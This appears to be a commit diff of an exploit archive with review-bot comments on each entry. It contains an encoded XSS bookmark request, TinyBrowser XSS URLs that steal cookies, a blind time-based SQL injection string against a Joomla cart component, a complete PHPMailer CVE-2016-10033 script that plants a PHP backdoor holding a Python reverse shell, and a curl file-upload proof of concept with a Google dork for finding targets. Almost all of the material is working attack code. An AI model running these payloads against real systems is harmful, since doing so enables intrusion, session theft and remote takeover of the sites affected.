bmName=%2522%253e%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574%2528%2533%2529%253c%252f%2573%2563%2572%2569%2570%2574%253e%250a&host=2&description=3&tabs=4&service=HTTP&screenSize=4&screenSizeHtml5=4&colorSize=3&macAddr=&wolTime=90&apppath=&folder=&appcmdline=&tsfarmserverlist=&langsel=1&redirectclipboard=on&displayconnectionbar=on&autoreconnection=on&bitmapcache=on&themes=on&rdpCompression=on&audiomode=3&rdpExperience=1&rdpServerAuthFailAction=2&charset=UTF-8&sshKeyFile=&defaultWindowSize=1&kexAlgoList=0%2C1%2C2&cipherAlgoList=&hmacAlgoList=&citrixWindowSize=1&citrixWindowWidth=0&citrixWindowHeight=0&citrixWindowPercentage=0&citrixLaunchMethod=Auto&forceInstalledCheckbox=on&icaAddr=&vncEncoding=0&vncCompression=0&vncCursorShapeUpdates=0&vncUseCopyrect=on&vncRestrictedColors=on&vncShareDesktop=on&MC_App=inherit&MC_Copy=inherit&MC_Print=inherit&MC_Offline=inherit&name=1%22+javascript%3Aconfirm(251)%3B&type=user&owner=zslab&cmd=edit&parentBmId=0&ownerdomain=ZSLAB&serviceManualConfigList=undefined&wantBmData=true&swcctn=1NcP8JhUY10emue9YQpON1p2c%3D6P0c9P&ok=OK
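Review bot: the description's last sentence, "The WAF was bypassed via form-based CSRF", does not say what the editBookmark request changes on the appliance, and the "Firmware fixed: 8.1.0.3" / "Issue ID: 172692" lines do not say which of the two findings they cover. State per finding what is affected and whether 8.1.0.3 resolves it, so someone triaging the advisory can tell if upgrading closes both the reflected XSS parameters and the bookmark request.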


@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/57230/info
TinyBrowser is prone to multiple vulnerabilities.
An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/js/tiny_mce/plugins/tinybrowser/edit.php?type=%22%20style=%22xss:\0065xpression(alert(document.cookie))
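Review bot: this file is deleted outright, and no hunk in the visible part of the commit moves its edit.php `type` case or the securityfocus reference into the retained 38182.txt. If the intent is to consolidate the TinyBrowser XSS entries, confirm that 38182.txt already covers edit.php; otherwise the archive loses its record that this script is affected.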


@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/57230/info
TinyBrowser is prone to multiple vulnerabilities.
An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/site/js/tiny_mce/plugins/tinybrowser/upload.php?type=%22);alert(document.cookie)//

platforms/php/webapps/40973.txt Executable file

@ -0,0 +1,24 @@
# Exploit Title: Sqli Blind Timebased on Joomla + Viertuemart + aweb-cartwatching-system/aweb-cartwatching <= 2.6.0
# Date: 28-12-2016
# Software Link: http://awebsupport.com/products/aweb-cartwatching-system
# Exploit Author: Javi Espejo(qemm)
# Contact: http://twitter.com/javiespejo
# Website: http://raipson.com
# CVE: REQUESTED
# Category: webapps
1. Description
Any remote user can access to the victim server trough a SQLI Blind Injection on a component of aweb_cartwatching_system and aweb_cart_autosave
This the code that has the parameters with the parameters not sanitized
2. Proof of Concept
option=com_virtuemart&view=categorysearch' RLIKE (SELECT * FROM (SELECT(SLEEP(5)))sgjA) AND 'jHwz'='jHwz&task=smartSearch and it works and I can access to every database on the client system launching other queries.
3. Solution:
Update to version 2.6.1 from the update center of joomla.
The Joomla vel publish the vulnerability on
Answer from Joomla VEL "We have added it to the VEL here: https://vel.joomla.org/resolved/1897-aweb-cart-watching-system-2-6-0
http://awebsupport.com/
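Review bot: section 1 announces "the code that has the parameters not sanitized" but no code follows, and the vulnerable parameter is never named; it can only be guessed from the position of the quote in the section 2 string. Name the parameter and the component file in the description, and move the trailing commentary ("and it works and I can access ...") off the request line so the string can be read on its own. The "CVE: REQUESTED" placeholder and the unfinished "The Joomla vel publish the vulnerability on" line should be resolved or removed; the VEL URL on the next line is the reference a site owner needs.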

platforms/php/webapps/40974.py Executable file

@ -0,0 +1,65 @@
"""
# Exploit Title: PHPMailer Exploit v1.0
# Date: 29/12/2016
# Exploit Author: Daniel aka anarc0der
# Version: PHPMailer < 5.2.18
# Tested on: Arch Linux
# CVE : CVE 2016-10033
Description:
Exploiting PHPMail with back connection (reverse shell) from the target
Usage:
1 - Download docker vulnerable enviroment at: https://github.com/opsxcq/exploit-CVE-2016-10033
2 - Config your IP for reverse shell on payload variable
4 - Open nc listener in one terminal: $ nc -lnvp <your ip>
3 - Open other terminal and run the exploit: python3 anarcoder.py
Video PoC: https://www.youtube.com/watch?v=DXeZxKr-qsU
Full Advisory:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
"""
from requests_toolbelt import MultipartEncoder
import requests
import os
import base64
from lxml import html as lh
os.system('clear')
print("\n")
print(" █████╗ ███╗ ██╗ █████╗ ██████╗ ██████╗ ██████╗ ██████╗ ███████╗██████╗ ")
print("██╔══██╗████╗ ██║██╔══██╗██╔══██╗██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔══██╗")
print("███████║██╔██╗ ██║███████║██████╔╝██║ ██║ ██║██║ ██║█████╗ ██████╔╝")
print("██╔══██║██║╚██╗██║██╔══██║██╔══██╗██║ ██║ ██║██║ ██║██╔══╝ ██╔══██╗")
print("██║ ██║██║ ╚████║██║ ██║██║ ██║╚██████╗╚██████╔╝██████╔╝███████╗██║ ██║")
print("╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝")
print(" PHPMailer Exploit CVE 2016-10033 - anarcoder at protonmail.com")
print(" Version 1.0 - github.com/anarcoder - greetings opsxcq & David Golunski\n")
target = 'http://localhost:8080'
backdoor = '/backdoor.php'
payload = '<?php system(\'python -c """import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\'192.168.0.12\\\',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"])"""\'); ?>'
fields={'action': 'submit',
'name': payload,
'email': '"anarcoder\\\" -OQueueDirectory=/tmp -X/www/backdoor.php server\" @protonmail.com',
'message': 'Pwned'}
m = MultipartEncoder(fields=fields,
boundary='----WebKitFormBoundaryzXJpHSq4mNy35tHe')
headers={'User-Agent': 'curl/7.47.0',
'Content-Type': m.content_type}
proxies = {'http': 'localhost:8081', 'https':'localhost:8081'}
print('[+] SeNdiNG eVIl SHeLL To TaRGeT....')
r = requests.post(target, data=m.to_string(),
headers=headers)
print('[+] SPaWNiNG eVIL sHeLL..... bOOOOM :D')
r = requests.get(target+backdoor, headers=headers)
if r.status_code == 200:
print('[+] ExPLoITeD ' + target)
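Review bot: `proxies` is assigned but never passed to either `requests` call, and the docstring writes the identifier as "CVE 2016-10033" without the hyphen, so the file does not match a search for the standard CVE-2016-10033 form. Drop the dead assignment and normalise the CVE string. The usage steps are also numbered 1, 2, 4, 3 and should be renumbered.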

platforms/php/webapps/40976.txt Executable file

@ -0,0 +1,24 @@
# Exploit Title: WordPress Templatic <= 2.3.6 Tevolution File Upload Vulnerability
# Date: 30-12-2016
# Software Link: Permium plugin
# Vendor Homepage: https://templatic.com/wordpress-plugins/tevolution
# Exploit Author: r3m1ck
# Website: https://www.r3m1ck.us/
# Category: webapps
# Google Dork: inurl:"wp-content/plugins/Tevolution/"
1. Description
Wordpress Slider Templatic Tevolution <= 2.3.6 suffers from file upload vulnerability.
Tevolution is not available for sale, it comes bundled with certain premium themes from templatic.
2. Proof of Concept
curl -k -X POST -F "file=@./ina.txt" http://VICTIM/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php
3. Uploaded file location:
Because this vulnerability plugin bundled with some premium themes from templatic, the location will be depends on the themes' name.
ex:
http://VICTIM/wp-content/themes/Directory/images/tmp/ina.txt
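Review bot: the write-up stops at the uploaded file location and has no solution or fixed-version section, and "Software Link: Permium plugin" is neither a link nor spelled correctly. Add what a site owner should do (which Tevolution release, if any, fixes single-upload.php, or that the vendor has not responded), and state whether the endpoint was reachable without authentication, since the curl line sends no credentials but the text never says so.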